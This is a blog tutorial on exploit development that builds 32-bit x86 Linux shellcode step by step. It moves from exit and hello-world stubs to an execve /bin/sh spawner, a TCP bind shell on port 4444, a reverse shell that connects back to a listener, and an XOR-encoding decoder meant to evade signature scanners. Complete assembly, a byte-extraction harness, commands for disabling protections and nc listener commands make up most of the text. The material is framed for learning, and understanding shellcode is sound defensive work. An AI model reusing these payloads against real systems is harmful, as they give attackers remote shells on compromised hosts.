Writing a Shell Code for Linux
Thilan Dissanayaka Exploit development Apr 21, 2020


When you exploit a buffer overflow, you overwrite the return address to hijack the program's execution flow. But redirect it to what? You need code to execute — and that code needs to be small, self-contained, and capable of running anywhere in memory without depending on external libraries or fixed addresses.

That code is shellcode.

In this post, we'll write Linux shellcode from scratch for 32-bit x86 systems. But more importantly, we'll explain why every single line is written the way it is. Why assembly? Why XOR instead of MOV? Why //bin/sh with two slashes? Why does a CALL instruction help us find our string? Every technique has a reason, and understanding those reasons is what separates someone who copies shellcode from someone who can write their own.

Note: This tutorial is for educational purposes — understanding shellcode is essential for both exploit developers and the defenders building protections against them. Always ensure you have proper authorization before testing on any systems.

Prerequisites

Before diving in, you should have a basic understanding of:

  • x86 assembly language (registers, stack operations, basic instructions)
  • How the stack works (push, pop, ESP, return addresses)
  • Linux system calls
  • Using a terminal and debugging tools

Environment Setup

# Install the tools we'll need
# (gcc-multilib provides the 32-bit libraries that gcc -m32 links against)
sudo apt-get update
sudo apt-get install nasm gcc gcc-multilib gdb strace

# Disable ASLR for consistent testing
# (ASLR randomizes memory addresses, making debugging harder)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Why Assembly?

Shellcode is written in assembly because it needs to be raw machine code — no compiler, no linker, no runtime, no libc. When you inject shellcode into a vulnerable program's memory, there's no loader to resolve function addresses, no dynamic linker to load shared libraries, and no operating system setup to initialize the environment.

You write assembly, assemble it into machine code, and that sequence of bytes runs directly on the CPU. Nothing in between.

High-level languages like C compile into machine code too, but they produce code that depends on:

  • The C runtime (startup code, _start, __libc_start_main)
  • Shared libraries (libc for printf, system, etc.)
  • Fixed memory addresses for global variables
  • A properly initialized stack and heap

None of those exist in an exploit scenario. So we go as low as we can — assembly.

How Linux System Calls Work (32-bit)

Everything useful that shellcode does — writing to the screen, spawning a shell, opening a network connection — goes through system calls. Syscalls are the interface between user-space programs and the Linux kernel.

On 32-bit Linux, the calling convention is:

Register   Purpose
EAX        System call number
EBX        First argument
ECX        Second argument
EDX        Third argument
ESI        Fourth argument
EDI        Fifth argument
EBP        Sixth argument

After loading the registers, you trigger the syscall with int 0x80 — a software interrupt that transfers control to the kernel.

The syscalls we'll use:

Syscall      Number   Signature
exit         1        exit(int status)
write        4        write(int fd, char *buf, int len)
execve       11       execve(char *filename, char **argv, char **envp)
dup2         63       dup2(int oldfd, int newfd)
socketcall   102      socketcall(int call, unsigned long *args)

You can find the full list in /usr/include/asm/unistd_32.h on a 32-bit system; on 64-bit Debian/Ubuntu it lives at /usr/include/x86_64-linux-gnu/asm/unistd_32.h.

Chapter 1: The Simplest Shellcode — exit(0)

Let's start with the absolute simplest shellcode possible: a clean exit.

section .text
global _start

_start:
    mov eax, 1      ; syscall number 1 = exit
    mov ebx, 0      ; exit status 0 = success
    int 0x80         ; trigger the syscall

Assemble, link, and run:

$ nasm -f elf32 exit.asm -o exit.o
$ ld -m elf_i386 exit.o -o exit
$ ./exit
$ echo $?
0

It works. But there's a problem — let's look at the machine code:

$ objdump -d exit -M intel

08048060 <_start>:
 8048060:   b8 01 00 00 00    mov    eax,0x1
 8048065:   bb 00 00 00 00    mov    ebx,0x0
 804806a:   cd 80             int    0x80

See all those 00 bytes? Those are null bytes, and they're the first enemy of shellcode.

The Null Byte Problem

This is one of the most important concepts in shellcode development, so let's understand it thoroughly.

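Many buffer overflow vulnerabilities involve string functions such as strcpy(), strcat(), gets(), and sprintf(). strcpy(), strcat(), and sprintf()'s %s process data until they encounter a null byte (0x00), which signals the end of the string. (gets() is the exception: it reads until a newline, 0x0a, so there the newline is the forbidden byte.)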

If your shellcode contains a null byte at position 10, the string function stops copying at position 10. Everything after that gets truncated. Your shellcode arrives incomplete, and it won't work.

So every null byte in our shellcode must be eliminated.

Let's fix our exit shellcode:

section .text
global _start

_start:
    xor eax, eax     ; EAX = 0 (no null bytes!)
    mov al, 1         ; AL = 1 (only sets the lowest byte of EAX)
    xor ebx, ebx     ; EBX = 0 (exit status)
    int 0x80

Let's examine why each change matters:

xor eax, eax instead of mov eax, 0

mov eax, 0 assembles to b8 00 00 00 00 — four null bytes. xor eax, eax assembles to 31 c0 — XOR-ing a register with itself always produces zero, and the instruction contains no null bytes. This is the standard way to zero a register in shellcode.

mov al, 1 instead of mov eax, 1

mov eax, 1 assembles to b8 01 00 00 00 — three null bytes, because EAX is a 32-bit register and the value 1 needs to be zero-padded to 32 bits. But mov al, 1 assembles to b0 01 — only 2 bytes, no nulls. AL is the lowest 8 bits of EAX, and since we already zeroed EAX with XOR, setting AL to 1 makes EAX = 1 without any null bytes.

Let's verify:

$ objdump -d exit -M intel

08048060 <_start>:
 8048060:   31 c0             xor    eax,eax
 8048062:   b0 01             mov    al,0x1
 8048064:   31 db             xor    ebx,ebx
 8048066:   cd 80             int    0x80

No null bytes. Eight bytes total. Clean.

Here's a quick reference of null-byte-free alternatives:

Need                          Bad (has nulls)   Good (null-free)
Set register to 0             mov eax, 0        xor eax, eax
Set register to small value   mov eax, 5        xor eax, eax then mov al, 5
Set register to 1             mov eax, 1        xor eax, eax then inc eax
Push 0 to stack               push 0            xor eax, eax then push eax

Chapter 2: Hello World Shellcode

Now let's write something that produces visible output — printing "Hello World!" using the write syscall.

The Naive Version

section .text
global _start

_start:
    ; write(1, "Hello World!\n", 13)
    mov eax, 4          ; syscall 4 = write
    mov ebx, 1          ; file descriptor 1 = stdout
    mov ecx, msg        ; pointer to the message
    mov edx, 13         ; message length
    int 0x80

    ; exit(0)
    mov eax, 1
    mov ebx, 0
    int 0x80

section .data
    msg db 'Hello World!', 0xa    ; 0xa = newline

This works as a standalone program, but it cannot work as shellcode. Why?

The msg label is in the .data section, and mov ecx, msg gets assembled as mov ecx, 0x080490a4 — a hardcoded memory address. When this shellcode runs inside an exploited program, that address points to something completely different (or invalid). The shellcode crashes.

This is the position-independence problem.

Position-Independent Code — The JMP-CALL-POP Trick

Shellcode doesn't know where in memory it will land. It might be injected into a stack buffer at 0xbffff000 one time and 0xbfffe800 the next (especially with ASLR). So it cannot use any hardcoded addresses.

But we still need to reference data — our "Hello World!" string has to live somewhere, and we need its address. How do we get the address of something when we don't know where we are in memory?

The answer is the JMP-CALL-POP technique, and it's one of the most elegant tricks in shellcode development.

Here's how it works:

  1. JMP forward to a CALL instruction at the end of the shellcode
  2. The CALL instruction jumps back to the shellcode's main body
  3. CALL has a critical side effect: it pushes the return address onto the stack — and the return address is the address of the instruction right after the CALL
  4. We place our string data right after the CALL instruction
  5. A POP instruction retrieves that address from the stack
         ┌──────── JMP to call_shellcode ───────────┐
         │                                           │
         ▼                                           │
    shellcode:                                       │
         POP ECX  ◄── ECX now has address of msg     │
         ...code...                                  │
         ...code...                                  │
                                                     │
    call_shellcode:                      ◄───────────┘
         CALL shellcode  ──► pushes address of next byte onto stack
         db 'Hello World!', 0xa    ◄── this address gets pushed!

When CALL shellcode executes, the CPU pushes the address of the next byte (the start of "Hello World!") onto the stack, then jumps to the shellcode label. The first instruction there is POP ECX, which grabs that address. Now ECX points to our string, regardless of where in memory the shellcode was loaded.

The Position-Independent Version

section .text
global _start

_start:
    jmp short call_shellcode      ; Step 1: jump to the CALL

shellcode:
    pop ecx                       ; Step 5: ECX = address of "Hello World!\n"

    ; write(1, ecx, 13)
    xor eax, eax
    mov al, 4                     ; syscall 4 = write
    xor ebx, ebx
    mov bl, 1                     ; fd 1 = stdout
    xor edx, edx
    mov dl, 13                    ; length = 13
    int 0x80

    ; exit(0)
    xor eax, eax
    mov al, 1                     ; syscall 1 = exit
    xor ebx, ebx                 ; status = 0
    int 0x80

call_shellcode:
    call shellcode                ; Steps 2-3: pushes address of the string, jumps back
    db 'Hello World!', 0xa       ; Step 4: our string data, right after the CALL

Notice:

  • Every register is zeroed with XOR before use (no null bytes)
  • Values are set using AL, BL, DL (8-bit registers) instead of full 32-bit MOV
  • The string is not in a .data section — it's embedded directly in the .text section, right after the CALL instruction
  • No hardcoded addresses anywhere

Extracting and Testing the Shellcode

# Assemble and link
$ nasm -f elf32 hello.asm -o hello.o
$ ld -m elf_i386 hello.o -o hello

# Test as standalone
$ ./hello
Hello World!

# Extract the raw bytes
$ objdump -d hello | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/' | tr -d '\n'

Now we need a way to test these bytes as actual injected shellcode. We write a C test harness — a program that treats the shellcode bytes as executable code:

#include <stdio.h>
#include <string.h>

// The shellcode bytes extracted from objdump
unsigned char shellcode[] =
"\xeb\x17"                 // jmp short call_shellcode (+0x17 bytes)
"\x59"                     // pop ecx
"\x31\xc0"                 // xor eax, eax
"\xb0\x04"                 // mov al, 4
"\x31\xdb"                 // xor ebx, ebx
"\xb3\x01"                 // mov bl, 1
"\x31\xd2"                 // xor edx, edx
"\xb2\x0d"                 // mov dl, 13
"\xcd\x80"                 // int 0x80
"\x31\xc0"                 // xor eax, eax
"\xb0\x01"                 // mov al, 1
"\x31\xdb"                 // xor ebx, ebx
"\xcd\x80"                 // int 0x80
"\xe8\xe4\xff\xff\xff"     // call shellcode (-28 bytes, back to pop ecx)
"Hello World!\x0a";        // the string data

int main() {
    printf("Shellcode length: %zu\n", strlen((char *)shellcode));

    // Cast the shellcode array to a function pointer and call it
    int (*ret)() = (int(*)())shellcode;
    ret();

    return 0;
}
# Compile with protections disabled
$ gcc -fno-stack-protector -z execstack -m32 test.c -o test

# Run
$ ./test
Shellcode length: 43
Hello World!

Why the special GCC flags?

  • -fno-stack-protector — Disables stack canaries (which would detect our buffer overflow in a real exploit)
  • -z execstack — Makes the stack executable (modern systems mark the stack as non-executable by default, which prevents shellcode from running)
  • -m32 — Compiles for 32-bit (since our shellcode is 32-bit)

Chapter 3: Spawning a Shell — execve("/bin/sh")

This is the shellcode that gives "shellcode" its name — code that spawns a shell. The goal is to call:

execve("/bin/sh", ["/bin/sh", NULL], NULL)

This replaces the current process with /bin/sh, giving the attacker an interactive shell. Let's understand the execve syscall first.

Understanding execve

int execve(const char *filename, char *const argv[], char *const envp[]);
  • filename (EBX) — Pointer to a null-terminated string: "/bin/sh\0"
  • argv (ECX) — Pointer to an array of argument strings, terminated by NULL: ["/bin/sh", NULL]
  • envp (EDX) — Pointer to environment variables array, terminated by NULL. We'll use NULL

So we need to build two structures on the stack, then load the registers:

  1. The string "/bin/sh" followed by a null byte
  2. An array containing a pointer to that string, followed by a NULL pointer
  3. The register values: EAX = 11 (execve), EBX = filename, ECX = argv, EDX = envp

The Stack Layout

Here's what we need in memory:

                    Low Address
                    ┌─────────────────────┐
            ESP ──► │ ptr to "/bin//sh"   │ ◄── argv[0]
                    ├─────────────────────┤
                    │ NULL (0x00000000)   │ ◄── argv[1] (terminates argv)
                    ├─────────────────────┤
            EBX ──► │ "//bi" (0x69622f2f) │ ◄── start of string
                    ├─────────────────────┤
                    │ "n/sh" (0x68732f6e) │
                    ├─────────────────────┤
                    │ NULL (0x00000000)   │ ◄── string terminator
                    └─────────────────────┘
                    High Address

Wait — why "//bin/sh" with two slashes instead of "/bin/sh"?

Why "//bin/sh" Instead of "/bin/sh"

"/bin/sh" is 7 characters, but we push data onto the stack in 4-byte (32-bit) chunks. Seven bytes don't split evenly: the second chunk would be "/sh" plus one more byte, and the obvious candidate for that byte is the null terminator. But push 0x0068732f ("/sh\0") assembles to 68 2f 73 68 00, putting a null byte into the shellcode itself, which is exactly what we're trying to avoid.

"//bin/sh" is 8 characters, so it fits exactly into two 4-byte PUSH instructions, and neither immediate contains a null byte. Linux treats multiple consecutive slashes in a path as a single slash, so //bin/sh names the same file as /bin/sh. The null terminator comes from a separate push of a zeroed register, which puts 00 bytes on the stack without ever putting them in the shellcode.

"//bin/sh" in memory (little-endian):
PUSH 0x68732f6e  →  "n/sh"  (pushed first, ends up at higher address)
PUSH 0x69622f2f  →  "//bi"  (pushed second, ends up at lower address)

Reading from low to high: "//bi" + "n/sh" = "//bin/sh" ✓

Remember — the stack grows downward, but strings are read forward (low to high). So we push the end of the string first.

The Assembly

section .text
global _start

_start:
    ; === Step 1: Clear all registers ===
    ; We don't know what's in these registers when our shellcode runs.
    ; Starting with known zero values is critical.
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    ; === Step 2: Push the string "//bin/sh\0" onto the stack ===

    push eax            ; Push 0x00000000 — this is the null terminator
                        ; for our string. We can't embed \x00 in the
                        ; shellcode bytes, but pushing a zeroed register
                        ; puts null bytes on the STACK, which is fine.

    push 0x68732f6e     ; Push "n/sh" (little-endian)
    push 0x69622f2f     ; Push "//bi" (little-endian)

    ; Now ESP points to "//bin/sh\0" on the stack
    mov ebx, esp        ; EBX = pointer to filename "//bin/sh"

    ; === Step 3: Build the argv array ===
    ; argv must be: [pointer_to_string, NULL]
    ; This is also built on the stack

    push eax            ; Push NULL — this terminates the argv array
    push ebx            ; Push pointer to "//bin/sh" — this is argv[0]

    ; Now ESP points to the argv array: [ptr, NULL]
    mov ecx, esp        ; ECX = pointer to argv array

    ; === Step 4: Set EDX (envp) ===
    ; EDX is already 0 (NULL) from the XOR above — no environment variables
    ; mov edx, eax      ; (already zero, but shown for clarity)

    ; === Step 5: Make the syscall ===
    mov al, 11          ; syscall 11 = execve
                        ; We use AL (not EAX) to avoid null bytes
    int 0x80            ; Transfer control to the kernel
                        ; If execve succeeds, this process is replaced
                        ; by /bin/sh — we never return here

Let's trace through the stack state at each step:

After "xor" instructions:
    EAX=0, EBX=0, ECX=0, EDX=0

After "push eax":
    Stack: [0x00000000]
    ESP ──►  ^

After "push 0x68732f6e":
    Stack: [0x68732f6e] [0x00000000]
    ESP ──►  ^

After "push 0x69622f2f":
    Stack: [0x69622f2f] [0x68732f6e] [0x00000000]
    ESP ──►  ^
    Reading as string from ESP: "//bin/sh\0" ✓

After "mov ebx, esp":
    EBX ──► "//bin/sh\0"

After "push eax" (NULL for argv terminator):
    Stack: [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
    ESP ──►  ^

After "push ebx" (pointer to string):
    Stack: [ptr_to_str] [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
    ESP ──►  ^

After "mov ecx, esp":
    ECX ──► [ptr_to_str, NULL]   (this is argv)
    EBX ──► "//bin/sh\0"         (this is filename)
    EDX = 0                      (this is envp = NULL)
    EAX = 11                     (syscall number)

    execve("/bin/sh", ["/bin/sh", NULL], NULL)  ✓

Compile and Test

$ nasm -f elf32 shell.asm -o shell.o
$ ld -m elf_i386 shell.o -o shell
$ ./shell
$ whoami
user
$ exit

You get a shell. The shellcode is 29 bytes, small enough to fit in most buffer overflow exploits.

Check for Null Bytes

$ objdump -d shell -M intel

08048060 <_start>:
 8048060:   31 c0       xor    eax,eax
 8048062:   31 db       xor    ebx,ebx
 8048064:   31 c9       xor    ecx,ecx
 8048066:   31 d2       xor    edx,edx
 8048068:   50          push   eax
 8048069:   68 6e 2f 73 68  push   0x68732f6e
 804806e:   68 2f 2f 62 69  push   0x69622f2f
 8048073:   89 e3       mov    ebx,esp
 8048075:   50          push   eax
 8048076:   53          push   ebx
 8048077:   89 e1       mov    ecx,esp
 8048079:   b0 0b       mov    al,0xb
 804807b:   cd 80       int    0x80

No 00 bytes anywhere, and no 0x0a (newline) either. This shellcode can pass through strcpy(), strcat(), and gets() intact.

Chapter 4: TCP Bind Shell

A bind shell is shellcode that opens a port on the target machine and waits for the attacker to connect. When someone connects, they get a shell. This is useful when the target is directly reachable from the attacker's network.

The C equivalent of what we're building:

int sockfd = socket(AF_INET, SOCK_STREAM, 0);

struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
addr.sin_addr.s_addr = INADDR_ANY;
bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));

listen(sockfd, 0);

int clientfd = accept(sockfd, NULL, NULL);

// Redirect stdin/stdout/stderr to the socket
dup2(clientfd, 0);  // stdin
dup2(clientfd, 1);  // stdout
dup2(clientfd, 2);  // stderr

char *argv[] = {"/bin/sh", NULL};
execve("/bin/sh", argv, NULL);

That's six operations: socket, bind, listen, accept, dup2 (×3), then execve, for nine syscalls in total. In 32-bit Linux, all socket operations go through a single syscall, socketcall (number 102). The first argument (EBX) specifies which socket operation, and the second argument (ECX) is a pointer to the operation's arguments on the stack.

EBX value   Operation
1           SYS_SOCKET
2           SYS_BIND
3           SYS_CONNECT
4           SYS_LISTEN
5           SYS_ACCEPT

The Assembly — With Explanations

section .text
global _start

_start:
    ; ============================================
    ; socket(AF_INET, SOCK_STREAM, 0)
    ; ============================================
    ; Creates a TCP socket. Returns a file descriptor in EAX.
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    mov al, 102         ; syscall 102 = socketcall
    mov bl, 1           ; SYS_SOCKET

    ; Build the argument array on the stack (pushed in reverse order)
    push edx            ; protocol = 0 (kernel picks TCP for SOCK_STREAM)
    push 1              ; SOCK_STREAM (TCP)
    push 2              ; AF_INET (IPv4)
    mov ecx, esp        ; ECX = pointer to arguments
    int 0x80            ; Returns socket fd in EAX

    mov esi, eax        ; Save the socket fd in ESI (we'll need it later)

    ; ============================================
    ; bind(sockfd, {AF_INET, 4444, 0.0.0.0}, 16)
    ; ============================================
    ; Binds the socket to port 4444 on all interfaces.
    ; We need to build a sockaddr_in struct on the stack.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 2           ; SYS_BIND

    ; Build sockaddr_in struct on the stack
    push edx            ; sin_addr = 0.0.0.0 (INADDR_ANY — listen on all interfaces)
    push word 0x5c11    ; sin_port = 4444 in network byte order (big-endian)
                        ; 4444 = 0x115C; network order needs bytes 11 5C in memory,
                        ; and x86 stores the immediate 0x5C11 little-endian as 11 5C
    push word 2         ; sin_family = AF_INET
    mov ecx, esp        ; ECX points to our sockaddr_in struct

    ; Build the argument array for bind()
    push 16             ; addrlen = sizeof(sockaddr_in) = 16
    push ecx            ; pointer to sockaddr_in struct
    push esi            ; socket fd
    mov ecx, esp        ; ECX = pointer to arguments
    int 0x80

    ; ============================================
    ; listen(sockfd, 0)
    ; ============================================
    ; Marks the socket as a passive socket that accepts connections.
    ; Backlog of 0 means only one pending connection at a time.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 4           ; SYS_LISTEN
    push edx            ; backlog = 0
    push esi            ; socket fd
    mov ecx, esp
    int 0x80

    ; ============================================
    ; accept(sockfd, NULL, NULL)
    ; ============================================
    ; Waits for an incoming connection. Blocks until someone connects.
    ; Returns a NEW file descriptor for the connected client.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 5           ; SYS_ACCEPT
    push edx            ; addrlen = NULL (we don't care who connected)
    push edx            ; addr = NULL
    push esi            ; socket fd
    mov ecx, esp
    int 0x80

    mov ebx, eax        ; Save client fd in EBX (needed for dup2)

    ; ============================================
    ; dup2(clientfd, 0/1/2) — redirect I/O to the socket
    ; ============================================
    ; This is the critical step. We redirect stdin (0), stdout (1),
    ; and stderr (2) to the client socket. After this, anything the
    ; shell reads comes from the network, and anything it writes
    ; goes back over the network.
    ;
    ; Without this step, the shell would read from the target's
    ; terminal and write to the target's terminal — useless to us.
    xor ecx, ecx        ; ECX = 0 (start with stdin)
dup_loop:
    xor eax, eax
    mov al, 63           ; syscall 63 = dup2
    int 0x80             ; dup2(clientfd, ecx)
    inc ecx              ; next fd (0 → 1 → 2)
    cmp cl, 3            ; done all three?
    jne dup_loop         ; if not, loop

    ; ============================================
    ; execve("//bin/sh", ["//bin/sh", NULL], NULL)
    ; ============================================
    ; Same technique as Chapter 3 — push string on stack, set up argv.
    xor eax, eax
    push eax             ; null terminator for string
    push 0x68732f6e      ; "n/sh"
    push 0x69622f2f      ; "//bi"
    mov ebx, esp         ; EBX = pointer to "//bin/sh"

    push eax             ; argv terminator (NULL)
    push ebx             ; argv[0] = pointer to "//bin/sh"
    mov ecx, esp         ; ECX = pointer to argv
    mov edx, eax         ; EDX = NULL (no environment variables)

    mov al, 11           ; syscall 11 = execve
    int 0x80

Test It

# Compile
$ nasm -f elf32 bind_shell.asm -o bind_shell.o
$ ld -m elf_i386 bind_shell.o -o bind_shell

# Terminal 1 — run the bind shell
$ ./bind_shell

# Terminal 2 — connect to it
$ nc localhost 4444
whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)

You now have a remote shell over the network.

Chapter 5: TCP Reverse Shell

A bind shell waits for connections on the target. But what if the target is behind a firewall that blocks incoming connections? The answer is a reverse shell — the target connects back to the attacker.

The difference from the bind shell is confined to the middle of the sequence:

Bind Shell    Reverse Shell
socket()      socket()
bind()        connect()
listen()      (not needed)
accept()      (not needed)
dup2() ×3     dup2() ×3
execve()      execve()

Instead of bind + listen + accept, we use a single connect() to reach the attacker's machine. Much simpler.

section .text
global _start

_start:
    ; ============================================
    ; socket(AF_INET, SOCK_STREAM, 0)
    ; ============================================
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    mov al, 102         ; socketcall
    mov bl, 1           ; SYS_SOCKET
    push edx            ; protocol = 0
    push 1              ; SOCK_STREAM
    push 2              ; AF_INET
    mov ecx, esp
    int 0x80

    mov esi, eax        ; save socket fd

    ; ============================================
    ; connect(sockfd, {AF_INET, 4444, 127.0.0.1}, 16)
    ; ============================================
    ; Connect back to the attacker's machine.
    ; Change the IP address to your attacker machine's IP.
    xor eax, eax
    mov al, 102         ; socketcall
    mov bl, 3           ; SYS_CONNECT

    ; Build sockaddr_in on the stack
    push 0x0100007f     ; sin_addr = 127.0.0.1 in network byte order
                        ; 127 = 0x7f, 0 = 0x00, 0 = 0x00, 1 = 0x01
                        ; Stored as: 0x0100007f (little-endian representation
                        ; of the big-endian IP)
                        ;
                        ; WARNING: This contains null bytes (0x00)!
                        ; For a real exploit, you'd need a different IP
                        ; like 10.10.10.1 (0x010a0a0a) that has no nulls.

    push word 0x5c11    ; sin_port = 4444
    push word 2         ; sin_family = AF_INET
    mov ecx, esp

    push 16             ; addrlen
    push ecx            ; sockaddr struct
    push esi            ; socket fd
    mov ecx, esp
    int 0x80

    ; ============================================
    ; dup2(sockfd, 0/1/2)
    ; ============================================
    mov ebx, esi        ; socket fd (the CONNECTED socket, not a client fd)
    xor ecx, ecx
dup_loop:
    xor eax, eax
    mov al, 63
    int 0x80
    inc ecx
    cmp cl, 3
    jne dup_loop

    ; ============================================
    ; execve("//bin/sh", ["//bin/sh", NULL], NULL)
    ; ============================================
    xor eax, eax
    push eax
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp

    push eax
    push ebx
    mov ecx, esp
    mov edx, eax

    mov al, 11
    int 0x80

Test It

# Terminal 1 — attacker listens for the callback
$ nc -lvp 4444
Listening on 0.0.0.0 4444

# Terminal 2 — run the reverse shell (on the "target")
$ ./reverse_shell

# Back in Terminal 1 — a shell appears
Connection received on 127.0.0.1 54321
whoami
user

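About the null bytes in the IP address: 127.0.0.1 contains null bytes (0x00). In a real exploit, you'd use an attacker IP that doesn't contain null bytes, or encode the shellcode to avoid the issue. Check the other bad characters too: 10.10.10.1 (0x010a0a0a) has no nulls, but 0x0a is a newline, which breaks gets()-based overflows. For local testing, 127.1.1.1 (0x0101017f) also reaches the loopback interface on Linux and contains no nulls.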

Shellcode Optimization Techniques

Size Matters

Smaller shellcode = more likely to fit in the available buffer. Every byte counts. Some tricks:

; Instead of two instructions to zero and set:
xor eax, eax     ; 2 bytes
mov al, 11        ; 2 bytes (total: 4 bytes)

; Sometimes you can use:
push 11           ; 2 bytes
pop eax           ; 1 byte  (total: 3 bytes)

; CDQ: if EAX's sign bit is clear (EAX >= 0 as a signed value), sets EDX to 0
; (sign-extends EAX into EDX:EAX)
xor eax, eax      ; 2 bytes
cdq                ; 1 byte — EDX is now 0 too (saves "xor edx, edx")

; MUL: multiplying by zero zeroes both EAX and EDX
xor ecx, ecx      ; 2 bytes
mul ecx            ; 2 bytes — EAX=0, EDX=0 (zeroed two registers with one trick)

Polymorphic Shellcode

Advanced shellcode can encode itself to evade signature-based detection. A small decoder stub at the beginning decodes the rest of the shellcode at runtime:

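decoder:
    jmp short get_shellcode
decode:
    pop esi                  ; ESI = address of encoded shellcode
    xor ecx, ecx
    mov cl, SHELLCODE_LEN    ; length of encoded shellcode (must be 1-255)
decode_loop:
    xor byte [esi], 0xAA     ; XOR each byte with key 0xAA; this decodes in place,
                             ; so the bytes must sit in writable memory
    inc esi
    loop decode_loop         ; ECX -= 1; repeat while ECX != 0
    jmp short encoded_shellcode

get_shellcode:
    call decode
encoded_shellcode:
    ; ... XOR-encoded bytes here ...
    ; (the key 0xAA must not occur in the original shellcode,
    ;  or that byte encodes to 0x00)
SHELLCODE_LEN equ $ - encoded_shellcode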

The encoded bytes look nothing like the original, so a scanner matching the original shellcode's byte pattern won't recognize them, though the small decoder stub is itself a recognizable pattern. At runtime, the decoder XORs each byte with the key to reveal the real shellcode, then jumps to it.

Testing and Debugging

Using GDB

GDB is essential for stepping through shellcode instruction by instruction:

$ gdb ./test
(gdb) set disassembly-flavor intel
(gdb) break *&shellcode         # Break at the start of our shellcode array
(gdb) run
(gdb) x/20i $eip               # Disassemble next 20 instructions
(gdb) info registers            # Show all register values
(gdb) si                        # Step one instruction
(gdb) x/16xb $esp              # Examine 16 bytes at the stack pointer

Using strace

strace shows you every syscall the shellcode makes — invaluable for verifying it's doing what you expect:

$ strace ./test
execve("./test", ["./test"], 0x7fff...) = 0
...
write(1, "Hello World!\n", 13)          = 13
exit(0)                                 = ?

Checking for Null Bytes

# Show any instruction whose bytes include 00
# (grep -w matches only a standalone "00", not zeros inside addresses)
$ objdump -d shell | grep -w 00

If you see 00 in the hex dump of any instruction, that instruction needs to be rewritten.

Final Thoughts

Writing shellcode teaches you things that no other exercise can. You learn how the CPU actually executes instructions, how the stack really works, how system calls bridge user space and kernel space, and how strings and data structures look in raw memory. Every byte matters. Every instruction has consequences.

The progression we followed — exit → hello world → shell spawn → bind shell → reverse shell — mirrors how real exploit payloads are built. You start with something simple, verify it works, then add complexity one layer at a time. And at every step, the constraints (no null bytes, position-independent, small size) force you to think creatively about how to achieve your goal within tight limits.

If you want to go deeper, try these challenges:

  • Write a reverse shell that avoids all bad characters, not just null bytes (some exploits filter \x0a, \x0d, \xff, etc.)
  • Write a staged shellcode — a tiny first stage that downloads and executes a larger second stage
  • Port these examples to 64-bit (x86_64 uses syscall instead of int 0x80, and the register convention is different)
  • Write shellcode for a different architecture — ARM or MIPS

Happy hacking.
